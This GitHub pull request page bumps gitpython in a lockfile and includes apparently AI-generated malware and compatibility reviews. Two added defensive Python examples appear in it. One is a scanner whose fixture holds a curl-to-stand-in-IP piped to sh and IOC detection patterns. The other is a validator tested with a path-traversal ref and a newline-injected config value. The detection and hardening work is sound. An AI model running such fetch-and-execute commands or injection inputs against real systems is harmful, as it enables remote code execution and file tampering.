
build(deps): bump gitpython from 3.1.47 to 3.1.50 #20873

Merged: cmmarslender merged 2 commits into main from dependabot/pip/gitpython-3.1.50 on May 26, 2026

Conversation

@dependabot dependabot Bot commented on behalf of github May 9, 2026

Bumps gitpython from 3.1.47 to 3.1.50.

Release notes

Sourced from gitpython's releases.

3.1.50

What's Changed

New Contributors

Full Changelog: gitpython-developers/GitPython@3.1.49...3.1.50

3.1.49 - Security

What's Changed

Full Changelog: gitpython-developers/GitPython@3.1.48...3.1.49

3.1.48 - Security

Accidentally deleted the previous GH release, it did mention the advisory this fixes.

What's Changed

Full Changelog: gitpython-developers/GitPython@3.1.47...3.1.48

Commits


Note

Low Risk
Low risk dependency-only change confined to poetry.lock, though it may subtly affect any dev tooling that uses gitpython.

Overview
Updates the locked gitpython dependency from 3.1.47 to 3.1.50 in poetry.lock, including the associated artifact hashes.

Reviewed by Cursor Bugbot for commit 872ede9.

@dependabot dependabot Bot added the labels Changed (Required label for PR that categorizes merge commit message as "Changed" for changelog), dependencies (Pull requests that update a dependency file) and python (Pull requests that update Python code) May 9, 2026
@dependabot dependabot Bot requested a review from a team as a code owner May 9, 2026 08:39
@dependabot dependabot Bot added the Changed label (Required label for PR that categorizes merge commit message as "Changed" for changelog) May 9, 2026
socket-security Bot commented May 9, 2026

Review the following changes in direct dependencies.

Diff | Package | Supply Chain Security | Vulnerability | Quality | Maintenance | License
Updated | pypi/gitpython@3.1.47 ⏵ 3.1.50 | 93 | 100 +3 | 100 | 100 | 100


@cursor cursor Bot left a comment

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Reviewed by Cursor Bugbot for commit 843f2e3b66838d7391f119596fedadf4c263000b.

Comment thread poetry.lock Outdated

github-actions Bot commented May 9, 2026

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Verdict: benign

Why this looks safe

  • Upstream identity: The dependency is the real GitPython project; the bump stays on 3.1.x with public releases and linked PRs (reference hardening, config write validation, rev-parse behavior). That matches normal security maintenance, not a hijack pattern.

  • Code vs. claimed fixes: The malware scan’s changed-file list (git/config.py, git/refs/*.py, git/repo/*.py, tests) aligns with config / refs / repo hardening—not random new surfaces like crypto miners or exfil.

  • Scanner evidence:

    • Unicode / confusable / IOC: all zero after allowlisting — no GlassWorm-style invisible characters or obvious IOCs.
    • shell_process_spawn hits on subprocess in git/util.py and tests are expected for a library that shells out to git; they are not, by themselves, compromise indicators.
    • maintainer_drift on gitpython:0 matching 3.1.47->3.1.50 is almost certainly a false positive from a generic heuristic (your report even ties it to an “npm-maintainers” pattern), not evidence that the PyPI publisher changed.
  • Checklist items: No reported base64/eval exfil pipelines, startup persistence, typosquat, npm lifecycle scripts, or suspicious CI-only churn in what you summarized; lockfile entries for 3.1.50 with normal wheel/sdist hashes are consistent with a routine Poetry refresh.

Residual risk (normal, not “malicious”): Like any release, bugs could exist; CI should still pass. For merge confidence, rely on green tests and that poetry.lock only moves GitPython (and any declared transitive pins) as intended—but nothing here suggests supply-chain compromise.

Compatibility Analysis

Searching the codebase for GitPython usage and checking how it's declared as a dependency.

1) Where it appears

  • Declared: gitpython is pinned in poetry.lock (currently listed as 3.1.50 in this checkout). It is not named in pyproject.toml as a top-level dependency in the grep I ran.
  • Who pulls it in: tach (dev marker / extra == "dev") declares gitpython = ">=3.1,<4.0":

    [package.dependencies]
    gitpython = ">=3.1,<4.0"
    networkx = ">=2.6,<4.0"
  • First-party code: Under chia/, tools/, and chia/_tests/ there are no import git / from git... hits. The only git imports in the tree are under .upstream-dependency/ (bundled upstream GitPython sources for review), not application code.

2) Overlap with changed behavior (3.1.47 → 3.1.50)

Upstream changes called out in the PR are security hardening: safer reference handling, stricter config writes (control characters / section-name validation), worktree git_dir fix, pure-Python rev-parse tweaks, and a gitdb bump inside GitPython.

Chia has no direct GitPython usage to intersect those APIs. The only runtime consumer in this dependency graph is tach (dev tooling), which typically opens the repo and inspects history—not the same surface as “write arbitrary git config with control chars” or “pathological ref escape,” but we did not inspect tach’s source in this environment.

3) Risks / unknowns

  • Low: Patch release within the same major; changes are mostly restrictive (reject unsafe inputs) plus bug fixes—unlikely to break normal CI/dev usage.
  • Residual: Any indirect reliance on previously allowed unsafe ref/config paths could now raise or fail; that would show up as tach (or another transitive caller) errors in dev/CI, not in node/wallet runtime.
  • Non-code: maintainer_drift in your malware scan is a supply-chain heuristic, not evidence of compromise.

4) Recommendation

Merge (optionally merge with caveats: watch dev CI for tach if you run it in pipelines; main product code does not consume GitPython directly). Do not hold for API compatibility based on this repo’s usage—the bump is aligned with security advisories and Chia’s tree does not import git.


Malware Scan Summary

  • Status: warn
  • Warn only mode: true
  • Changed upstream files scanned: 15
  • Resolution strategy: tag_range
  • Changed node/vendor paths: 0
  • Changed lockfiles: 0
  • Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Unicode findings (post-allowlist): 0
  • Confusable findings (post-allowlist): 0
  • IOC findings (post-allowlist): 0
  • Heuristic findings (post-allowlist): 9

Top findings

  • test/test_index.py:16 shell_process_spawn :: import subprocess
  • test/test_index.py:85 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:92 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:125 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
  • git/util.py:44 shell_process_spawn :: import subprocess
  • git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
  • git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
  • git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
  • gitpython:0 maintainer_drift :: 3.1.47->3.1.50


coveralls-official Bot commented May 9, 2026

Coverage Report for CI Build 26295484600

Warning

Build has drifted: This PR's base is out of sync with its target branch, so coverage data may include unrelated changes.
Quick fix: rebase this PR.

Warning

No base build found for commit c9b6c92 on main.
Coverage changes can't be calculated without a base build.
If a base build is processing, this comment will update automatically when it completes.

Coverage: 91.498%

Details

  • Patch coverage: No coverable lines changed in this PR.

Uncovered Changes

No uncovered changes found.

Coverage Regressions

Requires a base build to compare against.


Coverage Stats

Coverage Status
Relevant Lines: 122097
Covered Lines: 111893
Line Coverage: 91.64%
Relevant Branches: 12036
Covered Branches: 10836
Branch Coverage: 90.03%
Branches in Coverage %: Yes
Coverage Strength: 1.83 hits per line

💛 - Coveralls


emlowe commented May 19, 2026

@dependabot recreate

@dependabot dependabot Bot force-pushed the dependabot/pip/gitpython-3.1.50 branch from 843f2e3 to 741b322 May 19, 2026 15:51
@github-actions

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Verdict: benign

Evidence

  • Upstream delta matches public releases — The scanned range lands on tagged GitPython 3.1.50; changed paths (git/config.py, git/refs/*.py, git/repo/*.py, git/util.py, matching tests, VERSION, changelog) are consistent with documented security hardening (reference handling, config writes) and routine fixes (worktrees, config key validation), not unrelated payloads.

  • Scanner corroborates low risk — Post-allowlist: 0 unicode/confusable/IOC hits. “shell_process_spawn” on subprocess in git/util.py and tests is expected for a library that shells out to git; it is not evidence of compromise.

  • Interpretation vs. scanner — The maintainer_drift / npm-maintainers hit on gitpython is almost certainly a false positive: GitPython is a PyPI package; an npm-oriented maintainer heuristic should not be treated as publisher drift for this bump.

  • Checklist items with nothing actionable — No reported obfuscation, exfiltration URLs, persistence writes, typosquatting (same canonical project), or npm lifecycle/script concerns; dependency integrity matches a small patch jump with published notes and compare links.

Residual note: Merge after normal CI; treat this bump as desirable given labeled security releases in the span you’re adopting.

Compatibility Analysis

Searching the codebase for GitPython usage and reviewing upstream changes relevant to those call sites.

1) Where gitpython shows up

  • Not declared in pyproject.toml as a direct dependency.
  • poetry.lock: only tach declares gitpython = ">=3.1,<4.0" (around line 3808). tach is an optional dev tool (extra == "dev" in the lock metadata).
  • chia/: no import git / from git. — GitPython is not used by application code in this tree.
  • .upstream-dependency/ is vendored GitPython source for review only, not runtime usage.

So usage is indirect: dev installs that pull tach get GitPython.


2) Overlap with 3.1.47 → 3.1.50 changes

Upstream highlights:

Area | Versions
Reference handling / path safety | 3.1.48
Config writes (control chars, key validation) | 3.1.49–3.1.50
Pure-Python rev-parse behavior | 3.1.49
Repo() discovery with GIT_DIR + linked worktrees | 3.1.50
Bundled gitdb submodule bump (upstream repo); PyPI still pins gitdb via metadata | 3.1.50

Tach almost certainly uses git.Repo / repo introspection on your tree. That does touch Repo() discovery and possibly refs/config paths at the margins, but these releases are fixes and hardening, not advertised API removals.

First-party Chia code: no intersection — nothing to break at source level.


3) Risks / unknowns

  • CI / dev-only: Impact is confined to environments where tach runs (e.g. modular-architecture checks). Production installs without dev may never install GitPython depending on how dependencies are resolved — still safe to treat this as low blast radius.
  • Stricter validation: Code that relied on writing odd config keys/values could now raise where it previously appeared to work — unlikely for normal tach usage on this repo.
  • Rev-parse tweaks: Possible subtle behavior change for unusual refs/paths; low probability for typical monorepo CI.

4) Recommendation

Merge — Strong upside (security fixes on refs/config handling), no direct usage in chia/, dependency only via tach under dev.

Sanity check after merge: run whatever CI/job invokes tach (if any) once on the PR branch to confirm no tooling regression.


Malware Scan Summary

  • Status: warn
  • Warn only mode: true
  • Changed upstream files scanned: 15
  • Resolution strategy: tag_range
  • Changed node/vendor paths: 0
  • Changed lockfiles: 0
  • Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Unicode findings (post-allowlist): 0
  • Confusable findings (post-allowlist): 0
  • IOC findings (post-allowlist): 0
  • Heuristic findings (post-allowlist): 9

Top findings

  • test/test_index.py:16 shell_process_spawn :: import subprocess
  • test/test_index.py:86 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:93 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:126 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
  • git/util.py:44 shell_process_spawn :: import subprocess
  • git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
  • git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
  • git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
  • gitpython:0 maintainer_drift :: 3.1.47->3.1.50
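
The scan summaries in this thread report four classes of evidence (unicode, confusable and IOC findings, all zero after allowlisting, and heuristic hits such as shell_process_spawn that are expected in a library that shells out to git). The script below is an added example of how such a triage pass can be structured; it is not the scanner the bot ran and not GitPython code. Its rule names mirror the bot's categories by assumption, all file paths and contents are constructed (the hostile file is invented, not anything from GitPython), and the allowlist encodes the reasoning the comment gives: subprocess use in git/util.py and under test/ is expected, so only hits elsewhere survive.

```python
"""Triage heuristics like those in the malware-scan summary above.

Added example, not the scanner the bot ran and not GitPython code. It runs
four checks over a constructed set of changed files (invisible format
characters, mixed-script identifiers, process spawning, crude IOCs) and then
applies an allowlist so that subprocess use inside a git wrapper's util module
and its tests is expected rather than reported. All paths and contents below
are constructed; the rule names mirror the bot's categories by assumption.
"""
import re
import unicodedata

IDENT_RE = re.compile(r"[^\W\d]\w*")
SPAWN_RE = re.compile(r"\b(?:subprocess|os\.system|os\.popen|os\.exec\w*)\b")
IOC_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b|\bb64decode\(")
# (path pattern, rule) pairs where a hit is expected and therefore suppressed.
ALLOW = [(re.compile(r"^git/util\.py$"), "shell_process_spawn"),
         (re.compile(r"^test/"), "shell_process_spawn")]


def is_invisible(ch):
    """Format controls (zero-width, bidi overrides, tags) and variation selectors."""
    cp = ord(ch)
    return (unicodedata.category(ch) == "Cf"
            or 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF)


def mixed_script(ident):
    """ASCII letters mixed with non-Latin letters, e.g. Cyrillic U+0430 in 'path'."""
    if ident.isascii() or not any(c.isascii() and c.isalpha() for c in ident):
        return False
    scripts = {unicodedata.name(c, "UNKNOWN").split()[0]
               for c in ident if c.isalpha() and not c.isascii()}
    return bool(scripts - {"LATIN"})


def scan_file(path, text):
    """Return (path, line, rule, detail) tuples for one file, before allowlisting."""
    out = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line):
            if is_invisible(ch):
                out.append((path, lineno, "unicode", f"U+{ord(ch):04X} at col {col}"))
        for m in IDENT_RE.finditer(line):
            if mixed_script(m.group()):
                out.append((path, lineno, "confusable", m.group()))
        if SPAWN_RE.search(line):
            out.append((path, lineno, "shell_process_spawn", line.strip()))
        if IOC_RE.search(line):
            out.append((path, lineno, "ioc", line.strip()))
    return out


def allowlisted(path, rule):
    """True when this rule firing on this path is expected for the project."""
    return any(rx.search(path) and r == rule for rx, r in ALLOW)


def scan(files):
    """files: {path: text}. Returns (all findings, findings left after allowlist)."""
    raw = [f for path, text in files.items() for f in scan_file(path, text)]
    kept = [f for f in raw if not allowlisted(f[0], f[2])]
    return raw, kept


# Constructed changed-file set: the first three look like a git wrapper and its
# tests; the fourth is an invented hostile file (not anything from GitPython).
FILES = {
    "git/util.py": "import subprocess\n\ndef spawn(cmd):\n    return subprocess.Popen(cmd)\n",
    "test/test_index.py": "import subprocess\nprocess = subprocess.run(command, capture_output=True)\n",
    "git/config.py": "def write(name, value):\n    return name + value\n",
    "git/refs/injected_example.py": (
        "def _get_validated_p\u0430th(p):\n"      # Cyrillic a (U+0430) inside an identifier
        "    return p\u200b\n"                    # zero-width space (U+200B)
        "import os\n"
        "os.system('curl http://203.0.113.5/x | sh')\n"
    ),
}

if __name__ == "__main__":
    raw, kept = scan(FILES)
    print(f"{len(raw)} raw findings, {len(kept)} after allowlist")
    for finding in kept:
        print(*finding)
```

The allowlist is keyed on (path, rule) rather than on rule alone, which is what keeps "subprocess is fine in git/util.py" from silently excusing a process spawn in a refs module; a maintainer_drift style rule that has nothing to do with file contents would live outside this loop, and the thread's reading that such a hit is a publisher-metadata heuristic rather than a content finding is consistent with that split.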


emlowe commented May 22, 2026

@dependabot recreate

Bumps [gitpython](https://github.com/gitpython-developers/GitPython) from 3.1.47 to 3.1.50.
- [Release notes](https://github.com/gitpython-developers/GitPython/releases)
- [Changelog](https://github.com/gitpython-developers/GitPython/blob/main/CHANGES)
- [Commits](gitpython-developers/GitPython@3.1.47...3.1.50)

---
updated-dependencies:
- dependency-name: gitpython
  dependency-version: 3.1.50
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot force-pushed the dependabot/pip/gitpython-3.1.50 branch from 741b322 to d72a2a4 May 22, 2026 14:51

github-actions Bot commented May 22, 2026

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Reviewing how gitpython is declared and used in this repo, and what the dependency update changes.

Verdict: benign

Supply-chain malware review

  • PR scope: Lockfile-only bump in poetry.lock (gitpython 3.1.47 → 3.1.50, with matching sha256 hashes for wheel/sdist). No repo application code, workflows, or install scripts changed.
  • Scanner evidence (hard): unicode, confusable, and ioc = 0. Status warn is from heuristics only, not confirmed malware signals.
  • Heuristic disagreements:
    • shell_process_spawn (8 hits): Expected for GitPython (wraps the git CLI via subprocess). Upstream git/util.py change in this range is a one-line type annotation fix, not new process-spawning logic.
    • maintainer_drift (3.1.47->3.1.50): False positive — normal semver patch bump on the official gitpython-developers/GitPython repo, not npm maintainer takeover.
  • Upstream diff (15 files, tag range 4199cb8..5a294a6): Security-hardening changes — path validation for refs (_get_validated_path), config write validation (reject CR/LF/NUL), worktree GIT_DIR fix, gitdb submodule bump. No obfuscation, eval/exec, exfil URLs, persistence writes, or suspicious lifecycle hooks.
  • Integrity: Sequential tagged releases (3.1.48/3.1.49 marked security); no ghost version or unexpected new top-level packages. gitdb/smmap remain existing transitives.
  • Chia exposure: gitpython is not imported under chia/; it is a dev transitive of tach (pyproject.toml dev extra). Runtime attack surface for the node is minimal; the update mainly pulls in upstream CVE fixes.

Recommendation: Approve from a malware/supply-chain perspective. The scanner warn should not block merge; treat it as noise unless you want to tune heuristics for Git libraries. Merge is still worthwhile for the documented security fixes in 3.1.48–3.1.50.

Compatibility Analysis

Analyzing GitPython usage in the repo and comparing it with upstream changes in 3.1.48–3.1.50.

Compatibility & adoption analysis — GitPython 3.1.47 → 3.1.50

1) Where it appears in this repo

No direct usage. There are no import git / from git import … calls under chia/ or project scripts.

Transitive dev-only dependency:

Chain | Role
pyproject.toml dev extra → tach | Module-boundary linter
tach → gitpython (via poetry.lock) | Git integration inside tach

How chia actually invokes it:

  • Primary: .pre-commit-config.yaml runs ./activated.py tach check (also in .github/workflows/pre-commit.yml).
  • Secondary (if used): tach test, tach export/upload, and the tach pytest plugin (--tach* flags).

GitPython is gated behind extra == "dev" in the lockfile — not part of production/runtime installs.


2) Intersection with changed APIs (3.1.48–3.1.50)

Upstream changes are security/hardening, not breaking API removals:

Release change | Tach touchpoint | Overlap with chia usage
3.1.48 — block out-of-repo reference paths | None (tach does not create/delete refs) | None
3.1.49 — reject control chars in config writes; rev-parse improvements | config_reader().get_value(...) (read-only); repo.git.rev_parse("--show-toplevel") in get_changed_files | Only via optional tach paths; reads only
3.1.50 — validate config key/section names on write; linked-worktree Repo() autodiscovery | Repo(project_root, search_parent_directories=True) in git_ops.py | Helps CI/worktree setups; no write paths

Important: tach check (the pre-commit hook) uses the Rust extension.check() path and does not import GitPython. GitPython is loaded only by:

  • tach/filesystem/git_ops.py: get_changed_files, get_current_branch_info
  • Used by tach modularity, tach test, and the pytest plugin

Those code paths are read-only: open repo, git diff, git ls-files, rev-parse, read config/branch metadata.


3) Risks / unknowns

Risk | Severity | Notes
Runtime/production impact | None | Dev-extra only; not shipped with chia node/wallet
tach check regression | Very low | Does not call GitPython
Pytest plugin / tach test | Low | Uses GitPython for diff discovery; security fixes are tightening, not loosening behavior
rev-parse behavior change | Low | Could affect edge-case repo layouts; normal GitHub checkouts should be fine
Lockfile metadata shift (gitpython/gitdb/smmap marked non-optional in main group) | Cosmetic | Poetry/uv resolution artifact; still optional = true + extra == "dev" marker
Malware scan “maintainer_drift” | Informational | No IOCs; expected for version bumps on PyPI packages
gitdb submodule bump inside GitPython | Low | Internal to GitPython; no direct chia usage

Unknown: No chia CI job appears to run tach test or pytest with --tach; those paths are unverified in CI but are optional developer workflows.


4) Recommendation: merge

This is a security-motivated patch bump (3.1.48–3.1.50) on a dev-only transitive dependency with no direct chia code coupling. The main pre-commit surface (tach check) does not exercise the changed GitPython APIs.

Merge rationale: picks up reference/config hardening with negligible compatibility risk; staying on 3.1.47 leaves known security fixes unapplied for dev tooling.

Post-merge sanity check: confirm pre-commit CI passes (already the natural gate for this bump). No additional targeted testing required unless you routinely use pytest --tach or tach test.


Malware Scan Summary

  • Status: warn
  • Warn only mode: true
  • Changed upstream files scanned: 15
  • Resolution strategy: tag_range
  • Changed node/vendor paths: 0
  • Changed lockfiles: 0
  • Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
  • Unicode findings (post-allowlist): 0
  • Confusable findings (post-allowlist): 0
  • IOC findings (post-allowlist): 0
  • Heuristic findings (post-allowlist): 9

Top findings

  • test/test_index.py:16 shell_process_spawn :: import subprocess
  • test/test_index.py:86 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:93 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
  • test/test_index.py:126 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
  • git/util.py:44 shell_process_spawn :: import subprocess
  • git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
  • git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
  • git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
  • gitpython:0 maintainer_drift :: 3.1.47->3.1.50
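
The analyses in this thread describe the upstream hardening in general terms only: 3.1.48 blocks out-of-repo reference paths, 3.1.49 rejects CR/LF/NUL in config writes, and 3.1.50 validates config key and section names on write. The code below is an added example illustrating those two policies and is not GitPython's implementation (its function names and exact rules are not reproduced, and nothing here should be read as a claim about what upstream enforces). Every rule is an assumption chosen for the illustration; the naive writer is kept beside the validated one so the difference is visible on a value that carries a newline.

```python
"""Input checks of the kind the 3.1.48 to 3.1.50 notes in this thread describe.

Added example; not GitPython's implementation (its function names and exact
rules are not reproduced here). It illustrates two policies the comments refer
to: a reference name must resolve inside the repository's git directory, and a
config section, key or value written to disk must not carry characters that
would let it break out of its own line. Every rule below is an assumption
chosen for the illustration, not a statement of what upstream enforces.
"""
import os
import re


class UnsafeGitInput(ValueError):
    """Raised instead of touching disk when a name or value fails validation."""


def validated_ref_path(git_dir, ref_name):
    """Map a ref name such as 'refs/heads/main' to a path confined to git_dir.

    Assumed rules: names are relative, '/'-separated, and have no empty, '.'
    or '..' segments or NUL bytes; the joined path must still lie under git_dir.
    """
    if not ref_name or "\0" in ref_name or ref_name.startswith(("/", "\\")):
        raise UnsafeGitInput(f"bad ref name {ref_name!r}")
    parts = ref_name.replace("\\", "/").split("/")
    if any(p in ("", ".", "..") for p in parts):
        raise UnsafeGitInput(f"traversal or empty segment in {ref_name!r}")
    base = os.path.abspath(git_dir)
    target = os.path.abspath(os.path.join(base, *parts))
    # Belt and braces: even if the segment check were bypassed, refuse escapes.
    if os.path.commonpath([base, target]) != base:
        raise UnsafeGitInput(f"{ref_name!r} resolves outside {git_dir!r}")
    return target


# Assumed syntax: section names are alphanumerics, '.' and '-'; keys start with
# a letter and continue with alphanumerics and '-'. This mirrors the shape of
# git-config names but is not a claim about upstream's validator.
SECTION_RE = re.compile(r"^[A-Za-z0-9.-]+$")
KEY_RE = re.compile(r"^[A-Za-z][A-Za-z0-9-]*$")
CONTROL = "\r\n\0"


def naive_config_entry(section, key, value, subsection=None):
    """What gets written with no validation: a value can span lines."""
    header = f'[{section} "{subsection}"]' if subsection is not None else f"[{section}]"
    return f"{header}\n\t{key} = {value}\n"


def validated_config_entry(section, key, value, subsection=None):
    """Same output as naive_config_entry, but only for inputs that stay on one line."""
    if not SECTION_RE.match(section):
        raise UnsafeGitInput(f"bad section name {section!r}")
    if not KEY_RE.match(key):
        raise UnsafeGitInput(f"bad key {key!r}")
    if any(ch in value for ch in CONTROL):
        raise UnsafeGitInput(f"control character in value for {section}.{key}")
    if subsection is not None:
        if any(ch in subsection for ch in CONTROL):
            raise UnsafeGitInput(f"control character in subsection {subsection!r}")
        # Escape the two characters that are special inside a quoted subsection.
        subsection = subsection.replace("\\", "\\\\").replace('"', '\\"')
    return naive_config_entry(section, key, value, subsection)


def rejected(fn, *args, **kwargs):
    """True if fn refuses these arguments with UnsafeGitInput."""
    try:
        fn(*args, **kwargs)
    except UnsafeGitInput:
        return True
    return False


if __name__ == "__main__":
    # A value carrying a newline: written naively it yields a second section.
    sneaky = "x\n[other]\n\tinjected = yes"
    print(naive_config_entry("core", "label", sneaky))
    print("validated rejects it:", rejected(validated_config_entry, "core", "label", sneaky))
    print("ref escape rejected :", rejected(validated_ref_path, "/repo/.git", "../../etc/passwd"))
```

Two design points carry over to any wrapper that writes files another program parses: validate before formatting rather than trying to escape after, because a config value with a newline has no safe escaped form in this format, and confine paths by both segment rules and a final commonpath check, since the two fail in different ways.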

@emlowe emlowe removed the Changed label (Required label for PR that categorizes merge commit message as "Changed" for changelog) May 22, 2026
@cmmarslender cmmarslender merged commit f6d2ddc into main May 26, 2026
640 of 642 checks passed
@cmmarslender cmmarslender deleted the dependabot/pip/gitpython-3.1.50 branch May 26, 2026 15:13

Labels

dependencies (Pull requests that update a dependency file), python (Pull requests that update Python code)


3 participants